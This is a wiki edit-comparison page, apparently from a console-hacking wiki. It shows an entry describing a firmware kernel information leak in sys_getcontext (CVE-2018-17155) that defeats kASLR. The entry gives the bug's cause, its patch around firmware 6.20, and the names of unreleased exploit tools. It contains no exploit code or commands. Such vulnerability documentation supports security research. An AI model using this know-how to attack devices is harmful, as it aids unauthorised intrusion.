Editing Vulnerabilities
Jump to navigation
Jump to search
The edit can be undone. Please check the comparison below to verify that this is what you want to do, and then publish the changes below to finish undoing the edit.
Latest revision | Your text | ||
Line 1,279: | Line 1,279: | ||
=== FW <= 6.00 ?6.02? - sys_getcontext Information Leak (kASLR defeat) (CVE-2018-17155) === | === FW <= 6.00 ?6.02? - sys_getcontext Information Leak (kASLR defeat) (CVE-2018-17155) === | ||
==== Analysis ==== | |||
* https://www.cvedetails.com/cve/CVE-2018-17155/ | |||
* coming soon by CelesteBlue | |||
==== Bug Description ==== | |||
System call 421 or sys_getcontext() initializes the structure pointed at by ucp to the currently active context. The vulnerability is, some areas of memory copied out are not initialized, and thus the function leaks memory at certain spots. This vector was patched in 6.20, as now before the buffer is used it is initialized to 0 via bzero(). | |||
==== Exploit Implementation ==== | |||
* QuickHEN by CelesteBlue (v2 not released yet) | |||
* KitHEN by CelesteBlue (not released yet) | |||
==== Patched ==== | |||
'''Yes''' somewhere between 6.00 and 6.20 FW | |||
---- | |||
=== FW <= 6.00 ?6.02? - sys_getcontext Information Leak (kASLR defeat) === | |||
==== Analysis ==== | ==== Analysis ==== |